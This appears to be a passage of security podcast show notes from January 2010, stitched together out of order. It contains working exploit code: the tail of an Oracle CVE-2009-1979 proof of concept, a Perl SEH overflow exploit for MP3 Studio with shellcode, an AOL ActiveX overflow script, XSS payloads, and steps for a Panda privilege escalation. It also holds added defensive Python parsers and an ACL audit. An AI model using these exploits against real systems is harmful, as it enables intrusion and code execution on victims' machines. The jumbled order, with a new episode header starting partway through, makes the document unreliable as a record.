                "\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27"
                "\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52"
                "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49"
                "\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D"
                "\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52"
                "\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27"
                "\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52"
                "\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C"
                "\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27"
                "\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44"
                "\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41"
                "\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52"
                "\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45"
                "\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27"
                "\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41"
                "\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52"
                "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54"
                "\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E"
                "\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53"
                "\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41"
                "\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48"
                "\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C"
                "\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54"
                "\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41"
                "\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53"
                "\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20"
                "\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49"
                "\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00"
                "\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F"
                "\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44"
                "\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42"
                "\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42"
                "\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55"
                "\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00"
                "\x00\x00\x00\x00\x00\x00"
                ,1318);

            // byte 0x41 is the second byte of the little-endian length field
            // declared for the AUTH_SESSKEY value (0x40 becomes 0x8040)
            pkt1318[0x41]=0x80;

            s_send (s, pkt1318, 1318);

            r=closesocket (s);
            assert (r==0);
            return true;
        }
        else
        {
            printf ("while connect(): select() returns zero\n");
            r=closesocket (s);
            assert (r==0);
            return false;
        }
    }

    int main(int argc, char * argv[])
    {
        printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n");
        printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n");
        if (argc<2)
        {
            printf ("use: %s <hostname>\n", argv[0]);
            return 1;
        }

        return try_host (argv[1]) ? 0 : 1;
    }

  3. Sun Java System Web Server is subject to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Sun Java System Web Server 7.0 Update 6 is affected; other versions may also be vulnerable. Example request is available (note the missing method in the request line): " / HTTP/1.0\n\n"
  4. Panda Security is subject to a local privilege-escalation vulnerability. The following versions are affected: Panda Security for Business 4.04.10, Panda Security for Business with Exchange 4.04.10, Panda Security for Enterprise 4.04.10, Panda Internet Security 2010 (15.01.00), Panda Global Protection 2010 (3.01.00), Panda Antivirus Pro 2010 (9.01.00) and Panda Antivirus for Netbooks (9.01.00). During installation of Panda Security for Desktops/File Servers the permissions on the installation folder, %ProgramFiles%\Panda Software\AVTC, are by default set to Everyone: Full Control. Services are started from this folder, and those services run under the LocalSystem account. The 32-bit version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation.
    If the TruePrevent service (Panda TPSrv) is not running, the files are completely unprotected. A normal user is not able to stop the service, but can normally boot the workstation in SafeBoot mode, in which TPSrv is not started and all service files can be manipulated. This can be exploited by:
    a. Boot the PC in SafeBoot mode by pressing F8 during the boot process
    b. Rename PAVSRV51.exe to PAVSRV51.old in the Panda folder
    c. Copy any application to PAVSRV51.exe
    d. Reboot
    Upon reboot, the trojaned application will be executed under the LocalSystem account.
  5. Chipmunk News 2.0 is subject to multiple cross-site scripting vulnerabilities. This affects the sub, addaddress and searchaddress modules. Google Dork: inurl:admin/login.php "Registering Admin". Exploit samples are available:

    http://localhost/sub.php

    POSTDATA: email=<script>alert('xss')</script>&choice=sub&lists=1&submit=submit

    http://localhost/admin/addaddress.php

    POSTDATA: email=<script>alert('xss')</script>&lists=1&submit=submit

    http://localhost/admin/searchaddress.php

    POSTDATA: theaddress=<script>alert('xss')</script>&submit=submit
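
The Listener crash in item 1 starts with an ordinary TNS CONNECT packet whose connect string asks for service registration, something only a database instance on a trusted host should ever send to a listener. A network sensor on port 1521 can parse the CONNECT header, check that its length/offset pair stays inside the packet, and alert on COMMAND=service_register_* from anywhere else. The following parser and check are an added example written for these notes, not code from the podcast or from the PoC author; the sample packet is a constructed copy of the PoC's first packet, and the header layout it relies on (big-endian length at bytes 0-1, type at 4, connect-data length at 24-25 and offset at 26-27) is the standard TNS CONNECT header.

```python
import struct

TNS_CONNECT = 1  # packet type of the initial TNS CONNECT packet

# Constructed sample: a byte-for-byte copy of the first packet the PoC above
# sends.  Fields used here: length at 0-1, type at 4, connect-data length at
# 24-25 and connect-data offset at 26-27 (all big-endian).
SAMPLE_CONNECT = (
    b"\x00\x68\x00\x00\x01\x00\x00\x00"   # length 0x68 = 104, type 1 (CONNECT)
    b"\x01\x3A\x01\x2C\x00\x00\x20\x00"   # version 0x13A, compat 0x12C, SDU
    b"\x7F\xFF\xC6\x0E\x00\x00\x01\x00"   # TDU, NT protocol characteristics
    b"\x00\x2E\x00\x3A\x00\x00\x00\x00"   # connect data: 0x2E bytes at offset 0x3A
    + b"\x00" * 26                        # remaining header fields, all zero here
    + b"(CONNECT_DATA=(COMMAND=service_register_NSGR))"
)


def parse_tns_header(pkt):
    """Return (length, packet type) from the 8-byte TNS header, refusing a
    packet whose declared length disagrees with what was received."""
    if len(pkt) < 8:
        raise ValueError("short TNS header")
    length, _checksum, ptype, _flags, _hdr_checksum = struct.unpack(">HHBBH", pkt[:8])
    if length != len(pkt):
        raise ValueError("declared length %d, received %d" % (length, len(pkt)))
    return length, ptype


def parse_connect(pkt):
    """Extract the connect string of a CONNECT packet, checking that the
    length/offset pair stays inside the packet before slicing."""
    length, ptype = parse_tns_header(pkt)
    if ptype != TNS_CONNECT:
        raise ValueError("packet type %d is not CONNECT" % ptype)
    if length < 28:
        raise ValueError("CONNECT packet shorter than its fixed header")
    cd_len, cd_off = struct.unpack(">HH", pkt[24:28])
    if cd_off < 28 or cd_off + cd_len > length:
        raise ValueError("connect data (offset %d, length %d) lies outside the %d-byte packet"
                         % (cd_off, cd_len, length))
    return pkt[cd_off:cd_off + cd_len].decode("ascii", "replace")


def parse_connect_string(text):
    """Parse Oracle's (KEY=value) syntax into nested dicts.  Values may be
    nested lists, bare words or single-quoted strings; a repeated key keeps
    its last value."""
    pos = 0

    def skip_ws():
        nonlocal pos
        while pos < len(text) and text[pos].isspace():
            pos += 1

    def parse_node():
        nonlocal pos
        if text[pos] != "(":
            raise ValueError("expected '(' at %d" % pos)
        eq = text.find("=", pos)
        if eq < 0:
            raise ValueError("missing '=' after %d" % pos)
        key = text[pos + 1:eq].strip().upper()
        pos = eq + 1
        skip_ws()
        if pos < len(text) and text[pos] == "(":
            value = {}
            while pos < len(text) and text[pos] == "(":
                k, v = parse_node()
                value[k] = v
                skip_ws()
        elif pos < len(text) and text[pos] == "'":
            end = text.find("'", pos + 1)
            if end < 0:
                raise ValueError("unterminated quote at %d" % pos)
            value = text[pos + 1:end]
            pos = end + 1
            skip_ws()
        else:
            end = text.find(")", pos)
            if end < 0:
                raise ValueError("missing ')' after %d" % pos)
            value = text[pos:end].strip()
            pos = end
        if pos >= len(text) or text[pos] != ")":
            raise ValueError("expected ')' at %d" % pos)
        pos += 1
        return key, value

    result = {}
    skip_ws()
    while pos < len(text):
        k, v = parse_node()
        result[k] = v
        skip_ws()
    return result


def service_registration_findings(pkt, from_trusted_host):
    """Findings for one CONNECT packet.  COMMAND=service_register_* is what a
    database instance sends to register with its listener, so from any
    other host it deserves an alert; malformed packets are reported too."""
    try:
        tree = parse_connect_string(parse_connect(pkt))
    except ValueError as e:
        return ["malformed CONNECT packet: %s" % e]
    connect_data = tree.get("CONNECT_DATA")
    command = connect_data.get("COMMAND", "") if isinstance(connect_data, dict) else ""
    if command.lower().startswith("service_register") and not from_trusted_host:
        return ["service registration from untrusted host: %s" % command]
    return []
```

Feed `service_registration_findings` each CONNECT packet seen on port 1521 together with whether the source address belongs to a known database host; the same connect-string parser also exposes PROGRAM and ARGS values such as the `(PROGRAM=...oracle.exe)(ARGS='(LOCAL=NO)')` pair visible in the PoC's second packet, which is worth logging for the same reason.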

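The PoC in item 2 changes exactly one byte of an otherwise well-formed OAUTH call, `pkt1318[0x41]`, which in that packet is the second byte of the little-endian length declared for the AUTH_SESSKEY value: the server is told to expect 0x8040 bytes while only a 64-byte inline string follows. The check a hardened parser needs is to read every keyword/value pair by its inline length prefixes and refuse any declared length that disagrees with them. The code below is an added example written for these notes, not Oracle's code or the PoC author's; the pair encoding it assumes (LE32 key length, inline key, LE32 value length, inline value absent when the declared length is 0, LE32 flags, with 0xFE introducing a chunked form for long strings) is inferred from the bytes of the PoC packet above, and the packet builder exists only to construct test input.

```python
import struct

TNS_DATA = 6        # TNS packet type carrying TTI calls such as OAUTH
TTI_FUN = 0x03      # TTI "function call" message
OAUTH = 0x73        # function id of the authentication call in the PoC


def _inline(data):
    """Encode one inline string: 1-byte length + bytes, or for long strings
    0xFE followed by (1-byte length, bytes) chunks ending in a 0 length.
    Encoding inferred from the PoC packet (assumption)."""
    if len(data) < 0xFE:
        return bytes([len(data)]) + data
    out = bytearray(b"\xFE")
    for i in range(0, len(data), 0xFF):
        chunk = data[i:i + 0xFF]
        out += bytes([len(chunk)]) + chunk
    return bytes(out) + b"\x00"


def _read_inline(buf, pos):
    """Inverse of _inline; raises ValueError on truncation."""
    if pos >= len(buf):
        raise ValueError("truncated at offset %d" % pos)
    n = buf[pos]
    pos += 1
    if n != 0xFE:
        if pos + n > len(buf):
            raise ValueError("inline string of %d bytes truncated at %d" % (n, pos))
        return bytes(buf[pos:pos + n]), pos + n
    out = bytearray()
    while True:
        if pos >= len(buf):
            raise ValueError("chunked string missing terminator")
        n = buf[pos]
        pos += 1
        if n == 0:
            return bytes(out), pos
        if pos + n > len(buf):
            raise ValueError("chunk of %d bytes truncated at %d" % (n, pos))
        out += buf[pos:pos + n]
        pos += n


def build_oauth_packet(user, pairs):
    """Constructed test input in the layout of the PoC's OAUTH packet; only
    the length fields matter to the check, the other preamble words are
    copied as-is from the PoC."""
    body = bytes([TTI_FUN, OAUTH, 3])                     # TTI header, sequence 3
    body += b"\xFE\xFF\xFF\xFF" + struct.pack("<I", len(user))
    body += b"\x01\x01\x00\x00" + b"\xFE\xFF\xFF\xFF"
    body += struct.pack("<I", len(pairs))
    body += b"\xFE\xFF\xFF\xFF" * 2 + _inline(user)
    for key, value, flags in pairs:
        body += struct.pack("<I", len(key)) + _inline(key)
        body += struct.pack("<I", len(value))
        if value:                                         # empty values carry no inline string
            body += _inline(value)
        body += struct.pack("<I", flags)
    data = b"\x00\x00" + body                             # 2-byte data flags, then TTI
    return struct.pack(">HHBBH", 8 + len(data), 0, TNS_DATA, 0, 0) + data


def check_oauth_packet(pkt):
    """Parse an OAUTH DATA packet.  Returns (pairs, findings): a finding is a
    declared length that disagrees with the inline data, or a structural
    problem, after which nothing further in the packet is trusted."""
    findings = []
    try:
        if len(pkt) < 8:
            raise ValueError("short TNS header")
        length, _, ptype, _, _ = struct.unpack(">HHBBH", pkt[:8])
        if length != len(pkt):
            raise ValueError("declared packet length %d, received %d" % (length, len(pkt)))
        if ptype != TNS_DATA:
            raise ValueError("packet type %d is not DATA" % ptype)
        tti = pkt[10:]
        if len(tti) < 31 or tti[0] != TTI_FUN or tti[1] != OAUTH:
            raise ValueError("not an OAUTH call")
        user_len, = struct.unpack_from("<I", tti, 7)
        count, = struct.unpack_from("<I", tti, 19)
        user, pos = _read_inline(tti, 31)
        if len(user) != user_len:
            findings.append("user: declared length %d but %d bytes inline" % (user_len, len(user)))
        pairs = []
        for _ in range(count):
            key_len, = struct.unpack_from("<I", tti, pos)
            key, pos = _read_inline(tti, pos + 4)
            name = key.decode("ascii", "replace")
            if len(key) != key_len:
                findings.append("%s: declared key length %d but %d bytes inline" % (name, key_len, len(key)))
            val_len, = struct.unpack_from("<I", tti, pos)
            pos += 4
            value = b""
            if val_len:
                value, pos = _read_inline(tti, pos)
            if len(value) != val_len:
                findings.append("%s: declared value length %d but %d bytes inline" % (name, val_len, len(value)))
            flags, = struct.unpack_from("<I", tti, pos)
            pos += 4
            pairs.append((name, value, flags))
        return pairs, findings
    except (ValueError, struct.error) as e:
        return [], ["malformed OAUTH packet: %s" % e]


# Constructed pairs: a 64-character session key, a value long enough to use
# the chunked form (the PoC's AUTH_ALTER_SESSION is 489 bytes) and an empty one.
SAMPLE_PAIRS = [
    (b"AUTH_SESSKEY", b"0123456789ABCDEF" * 4, 1),
    (b"AUTH_ALTER_SESSION", b"X" * 489, 0),
    (b"AUTH_FAILOVER_ID", b"", 0),
]
```

With the user `scott` and AUTH_SESSKEY as the first pair, the constructed packet places the AUTH_SESSKEY length field at the same offset as the PoC does, so the single-byte change `pkt[0x41] = 0x80` reproduces the inconsistency the check is meant to catch.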

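The weakness in item 4 is not a binary but a folder ACL: a directory writable by Everyone that holds binaries a LocalSystem service loads is a privilege-escalation path, and, as the steps show, the TruePrevent driver that masks it is absent in SafeBoot mode while NTFS permissions still apply. The audit below is an added example written for these notes, not Panda's or the podcast's code; it parses the text `icacls` prints for a folder and reports services whose install folder grants write access to a low-privileged principal. The service inventory and the `icacls` output are constructed, with made-up service names, and the second vendor path stands in for a correctly configured install.

```python
import ntpath
import re

# Principals every local user effectively belongs to (constructed list;
# extend with site-specific groups).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}

# icacls simple rights (F, M, W) and specific rights that allow creating or
# replacing files in a directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO"}

# Constructed inventory: (service name, logon account, binary path).  The first
# entry models the case described above; the service names are made up.
SERVICES = [
    ("PAVSRV", "LocalSystem", r"C:\Program Files\Panda Software\AVTC\PAVSRV51.exe"),
    ("GoodAgent", "LocalSystem", r"C:\Program Files\GoodVendor\Agent\agent.exe"),
]

# Constructed `icacls <folder>` output for each install folder.
ICACLS_OUTPUT = {
    r"C:\Program Files\Panda Software\AVTC":
        "C:\\Program Files\\Panda Software\\AVTC Everyone:(OI)(CI)(F)\n"
        "                                    NT AUTHORITY\\SYSTEM:(OI)(CI)(F)\n"
        "                                    BUILTIN\\Administrators:(OI)(CI)(F)\n"
        "\nSuccessfully processed 1 files; Failed processing 0 files\n",
    r"C:\Program Files\GoodVendor\Agent":
        "C:\\Program Files\\GoodVendor\\Agent NT AUTHORITY\\SYSTEM:(OI)(CI)(F)\n"
        "                                BUILTIN\\Administrators:(OI)(CI)(F)\n"
        "                                BUILTIN\\Users:(OI)(CI)(RX)\n"
        "\nSuccessfully processed 1 files; Failed processing 0 files\n",
}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(folder, output):
    """Turn the text `icacls <folder>` prints into a list of
    (principal, set of right/flag tokens, denied) tuples."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(folder):            # first line carries the path
            line = line[len(folder):].strip()
        m = ACE_RE.match(line)
        if not m:
            raise ValueError("unparsed icacls line: %r" % raw)
        rights = set()
        for tok in re.findall(r"\(([^)]*)\)", m.group("rights")):
            rights.update(t.strip() for t in tok.split(","))   # "(RX,W)" style specific rights
        aces.append((m.group("principal"), rights, "DENY" in rights))
    return aces


def writable_by_low_priv(aces):
    """Principals from the low-privilege set granted (not denied) a right
    that lets files in the folder be created or replaced."""
    hits = []
    for principal, rights, denied in aces:
        if denied or principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        granted = sorted(rights & WRITE_RIGHTS)
        if granted:
            hits.append((principal, granted))
    return hits


def audit_services(services, icacls_output):
    """One finding per service whose binary lives in a folder that a
    low-privileged principal can write to."""
    findings = []
    for name, account, binary in services:
        folder = ntpath.dirname(binary)
        output = icacls_output.get(folder)
        if output is None:
            findings.append("%s: no ACL data for %s" % (name, folder))
            continue
        for principal, granted in writable_by_low_priv(parse_icacls(folder, output)):
            findings.append("%s (%s): %s grants %s %s"
                            % (name, account, folder, principal, ",".join(granted)))
    return findings
```

On a real host, take the binary path and account of each service from `sc qc <service>` or the Win32_Service WMI class, run `icacls "<folder>"` on the containing directory, and pass the real output in place of the constructed dictionary; a finding means any local user could replace the service binary regardless of whether a protection driver is loaded.
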
News Items of Interest:

News item 1: http://news.softpedia.com/news/Hundreds-of-Websites-Hosted-at-Network-Solutions-Defaced-132654.shtml

Network Solutions announced that several hundred websites hosted on its infrastructure fell victim in a mass defacement attack during the past several days. Preliminary findings suggest that a remote file inclusion technique was used to compromise several of the company’s Unix servers.

Network Solutions is one of the top five Internet domain name registrars, managing around 6.5 million domains as of January 2009. Apart from its successful domain registration business, the company also offers other services such as Web hosting, ecommerce or online marketing solutions.

News item 2: http://news.bbc.co.uk/2/hi/technology/8470735.stm

Manchester United Football Club has posted a message on its website explaining that its players do not belong to online social networks. It advises users to treat any profiles in the names of its players with “extreme scepticism”.  The club says this is because of the high numbers of people impersonating team members online.  There are many accounts across social network sites which claim to be in the name of high profile footballers.
News item 3: http://www.symantec.com/about/news/release/article.jsp?prid=20100120_02
Comcast is partnering with Symantec to offer residential and business high-speed Internet subscribers the Norton Security Suite at no cost. The suite includes PC security that protects against viruses, spyware, worms, Trojans, malicious bots and identity theft, as well as a range of customizable parental controls, which help keep children safe online and foster communication between parents and kids. Comcast subscribers with Macintosh systems will receive Norton Internet Security for Mac.

News item 4: http://support.apple.com/kb/HT4004
Apple has released six patches for Mac OS X and Mac OS X Server, including one for a zero-day flaw that could allow a hacker to hijack a web-browsing session.  The zero-day vulnerability, which was made public in November 2009, lies in an authentication gap in TLS (Transport Layer Security) and SSL (Secure Sockets Layer) encryption protocols, Apple said in an advisory on Tuesday.

News item 5: http://www.boston.com/business/technology/articles/2010/01/20/chinas_baidu_sues_us_company_over_hacking/
China’s most popular search engine, Baidu Inc., is accusing its U.S.-based domain name registry of negligence in a lawsuit over a hacking attack that temporarily blocked access to the site last week.

Baidu said Wednesday it has filed suit against Register.com Inc. in a New York court, seeking unspecified damages. Hackers blocked access to Baidu on Jan. 12 by steering traffic to a Web site where a group reportedly calling itself the “Iranian Cyber Army” claimed responsibility. There was no evidence the hackers were linked to Iran.
News item 6: http://www.imperva.com/docs/WP_Consumer_Password_Worst_Practices.pdf
What’s the most common password among the 32 million people whose accounts were hacked at RockYou late last year? According to a study by Imperva, it’s “123456,” followed by “12345,” “123456789” and “Password,” in that order. “iloveyou” came in at no. 5. The really depressing thing is that users tend to use the same passwords on all or most of their work and personal accounts. If you want your password to be the stunningly simple “123456” on RockYou and other social sites, that’s fine. Just don’t use that same password for gmail, your bank and your work accounts.

News item 7: http://nmap.org/download.html
Nmap 5.20 offers more than 150 significant improvements:

  • 30+ new Nmap Scripting Engine scripts
  • Enhanced performance and reduced memory consumption
  • Protocol-specific payloads for more effective UDP scanning
  • Massive OS and version detection DB updates (10,000+ signatures).

Nmap’s traceroute has been rewritten for better performance. Probes are sent in parallel to individual hosts, not just across all hosts as before. Trace consolidation is more sophisticated, allowing common traces to be identified sooner and fewer probes to be sent.

News item 8: http://www.theregister.co.uk/2010/01/22/tor_security_update/

Users of the Tor anonymiser network have been urged to upgrade their software, following the discovery of a security breach.  Two of seven directory authorities and a metrics data server were compromised in a hack discovered earlier this month, Tor developer Roger Dingledine explains. The three servers were taken offline and refurbished following the hack.  Fresh identity keys for the two directory authorities hit by the hack were created during the refurbishment process. Users should therefore update to either Tor version 0.2.1.22 or 0.2.2.7-alpha, so that they can use the refurbished servers as conduits for sensitive traffic.
News item 9: http://www.theregister.co.uk/2010/01/22/aurora_exploit_known_months/

Microsoft first knew of the bug used in the infamous Operation Aurora IE exploits as long ago as August, four months before the vulnerability was used in exploits against Google and other hi-tech firms in December, it has emerged. Redmond’s security gnomes finally got around to patching the exploit on Thursday. Microsoft’s advisory accompanying its cumulative update for IE credited Meron Sellem of Israeli firm BugSec for reporting the HTML Object Memory Corruption Vulnerability (CVE-2010-0249), the zero-day vulnerability used in the now infamous attacks.

News item 10: http://ligattsecurity.com/index.php?option=com_content&view=article&id=2261:lsi-offers-boobytrap-a-service-that-detects-who-installed-spyware-on-a-persons-computer&catid=434:ligatt-press-releases

2010
01.21

Episode 51 – USB Tomfoolery

InfoSec Daily Podcast

 
InfoSec Podcast Episode 51 for January 21, 2010. This podcast is our contribution back to the community, where we discuss vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Register online at the SANS website or call (301) 654-SANS (7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

  1. Microsoft Windows is subject to a 17-year-old local privilege-escalation vulnerability in the #GP trap handler. An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Exploit code is available.
  2. Sun Java System Web Server is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.  Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Sun Java System Web Server 7.0 Update 7 is affected; other versions may also be vulnerable. Example request is available:
    buf = "PUT / HTTP/1.0\n"
    buf += "Authorization: Digest "
    buf += "ABCD," * 1000
    buf += "\n\n"
  3. The Expat library is subject to a denial-of-service vulnerability because it fails to properly handle crafted XML data. Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable XML parsing library. Expat 2.0.1 is vulnerable; other versions may also be affected. Exploit code is available.
  4. AOL is subject to an ActiveX heap overflow vulnerability. Version 9.5 is affected, though others may be as well. The vulnerability is in the ActiveX control CDDBControl.dll: sending a long string to BindToFile() triggers it. Successful exploits allow remote attackers to execute arbitrary code. PoC .wsf script:
    <package><job id='DoneInVBS' debug='false' error='true'>
    <object classid='clsid:BC8A96C6-3909-11D5-9001-00C04F4C3B9F' id='target'
    />
    <script language='vbscript'>
    arg1=String(4000, "A")
    arg2=1
    target.BindToFile arg1 ,arg2
    </script>
    </job>
    </package>
  5. Al3jeb version 1.3 is subject to a remote change-password vulnerability. Exploit code is available:
    <html>
    <head>
    <title> al3jeb script Remote Change Password Exploit </title>
    </head>
    <body text="#00FF00" bgcolor="#000000">
    <form action="http://www.sample.com/al3jeb/Change_Pass.php" method="post"
    style="text-align: center">
    <b>For More </b>
    <p><b>visit us</b></p>
    <p>
    <a href="http://sec-war.com/cc/index.php"
    style="text-decoration: none; font-weight: 700">
    http://sec-war.com/cc/index.php</a></p>

    <p>
    <br>
    User: <input
    id="adminn" value="" />
    <br>
    Pass: <input
    id="adminp" value="" />
    <br>
    Email <input
    id="adminm" value="" />
    <br>
    <input
    value="Sec-War" /><br>
    <br>
    </p>
    </form>
    </body>
    </html>

  6. MP3 Studio v1.X is subject to a local stack overflow vulnerability when parsing .m3u files. Exploit code is available:
    #!/usr/bin/perl

    # Exploit Title: MP3 Studio v1.X (.m3u File) Local Stack Overflow
    # Date: 19.01.2010 – 01/19/2010
    # Author: NeoCortex
    # Software Link: http://www.freewarezoom.com/archives/millennium-mp3-studio
    # Version: 1.X
    # Tested on: Windows XP SP3 (de-de)

    # Original exploit found by HACK4LOVE
    # http://www.milw0rm.com/exploits/9277
    #
    # He wasn't able to exploit it, so I did it.
    # Nice training on SEH exploits.
    # Good luck finding some buddy using that media player
    #
    # Greetz to:
    # _-Sid-_ – Jess – >Roadkill< – Dawn – MouZe* – Linki
    #
    # 19.01.2010 by NeoCortex

    use strict;
    use warnings;

    my $noa = "http://" . "\x41" x 4103;  # junk up to the SEH record
    my $jmp = "\xeb\x1b\x90\x90";          # 00125D64 EB 1B JMP SHORT 00125D81
    my $seh = "\x25\x12\xc8\x72";          # 00125D68 72C81225 SE handler
    my $nob = "\x42" x 22;                 # cosmetic...

    my $payload =
    # payload taken from http://www.metasploit.com
    # windows/exec cmd=calc.exe
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47" .
    "\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32" .
    "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a" .
    "\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e" .
    "\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54" .
    "\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64" .
    "\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f" .
    "\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f" .
    "\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d" .
    "\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44" .
    "\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35" .
    "\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a" .
    "\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b" .
    "\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57" .
    "\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b" .
    "\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63" .
    "\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59" .
    "\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73" .
    "\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63" .
    "\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33" .
    "\x30\x47";

    open(my $fh, '>>', 'Neo_Crash.m3u') or die "cannot open Neo_Crash.m3u: $!";
    print $fh $noa . $jmp . $seh . $nob . $payload;
    close($fh);

  7. Microsoft Windows Defender (tested on Windows 7) is subject to an ActiveX heap overflow vulnerability in the MsMpSimpleConfig object's WriteValue() method. Exploit code is available:
    #Author : [SarBoT511]
    #Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC]
    #downloads :[www.microsoft.com]
